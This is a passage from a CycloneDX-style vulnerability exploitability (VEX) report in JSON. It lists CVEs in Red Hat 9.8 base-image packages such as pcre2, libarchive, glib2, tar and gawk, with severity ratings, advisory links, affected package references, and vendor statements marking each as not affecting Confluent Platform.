          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2022-41409",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        190
      ],
      "description": "Integer overflow vulnerability in pcre2test before 10.41 allows attackers to cause a denial of service or other unspecified impacts via negative input.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2022-41409"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2022-41409"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35"
        },
        {
          "url": "https://github.com/PCRE2Project/pcre2/issues/141"
        },
        {
          "url": "https://github.com/advisories/GHSA-4qfx-v7wh-3q4j"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-41409"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2022-41409"
        }
      ],
      "published": "2023-07-18T14:15:12+00:00",
      "updated": "2026-06-17T05:03:09+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "10.40-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "10.40-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/pcre2-syntax@10.40-6.el9?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/pcre2@10.40-6.el9?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-30571",
      "ratings": [
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H"
        }
      ],
      "cwes": [
        362
      ],
      "description": "Libarchive through 3.6.2 can cause directories to have world-writable permissions. The umask() call inside archive_write_disk_posix.c changes the umask of the whole process for a very short period of time; a race condition with another thread can lead to a permanent umask 0 setting. Such a race condition could lead to implicit directory creation with permissions 0777 (without the sticky bit), which means that any low-privileged local user can delete and rename files inside those directories.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-30571"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-30571"
        },
        {
          "url": "https://access.redhat.com/solutions/7033331"
        },
        {
          "url": "https://github.com/libarchive/libarchive/issues/1876"
        },
        {
          "url": "https://groups.google.com/g/libarchive-announce"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-30571"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-30571"
        }
      ],
      "published": "2023-05-29T20:15:09+00:00",
      "updated": "2026-06-17T05:55:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.5.3-9.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/libarchive@3.5.3-9.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-32636",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.2,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        400,
        502
      ],
      "description": "A flaw was found in glib, where the gvariant deserialization code is vulnerable to a denial of service introduced by additional input validation added to resolve CVE-2023-29499. The offset table validation may be very slow. This bug does not affect any released version of glib but does affect glib distributors who followed the guidance of glib developers to backport the initial fix for CVE-2023-29499.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-32636"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2024:2528"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-32636"
        },
        {
          "url": "https://bugzilla.redhat.com/2211827"
        },
        {
          "url": "https://bugzilla.redhat.com/2211828"
        },
        {
          "url": "https://bugzilla.redhat.com/2211829"
        },
        {
          "url": "https://bugzilla.redhat.com/2211833"
        },
        {
          "url": "https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2024-2528.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/2841"
        },
        {
          "url": "https://https://discourse.gnome.org/t/multiple-fixes-for-gvariant-normalisation-issues-in-glib/12835"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2023-32636.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2024-2528.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-32636"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20231110-0002/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6165-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-32636"
        }
      ],
      "published": "2023-09-14T20:15:09+00:00",
      "updated": "2026-06-17T05:59:16+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-39804",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 6.2,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "description": "In GNU tar before 1.35, mishandled extension attributes in a PAX archive can lead to an application crash in xheader.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-39804"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-39804"
        },
        {
          "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1058079"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4"
        },
        {
          "url": "https://git.savannah.gnu.org/cgit/tar.git/tree/src/xheader.c?h=release_1_34#n1723"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/03/msg00008.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-39804"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6543-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-39804"
        }
      ],
      "published": "2024-03-27T04:15:08+00:00",
      "updated": "2026-06-17T06:12:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2023-4156",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.1,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "A heap out-of-bounds read flaw was found in builtin.c in the gawk package. This issue may lead to a crash and could be used to read sensitive information.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2023-4156"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2023-4156"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2215930"
        },
        {
          "url": "https://git.savannah.gnu.org/gitweb/?p=gawk.git;a=commitdiff;h=e709eb829448ce040087a3fc5481db6bfcaae212"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00000.html"
        },
        {
          "url": "https://mail.gnu.org/archive/html/bug-gawk/2022-08/msg00023.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4156"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6373-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2023-4156"
        }
      ],
      "published": "2023-09-25T18:15:11+00:00",
      "updated": "2026-06-17T06:37:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "5.1.0-6.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/gawk@5.1.0-6.el9?arch=x86_64&distro=redhat-9.8"
        },
        {
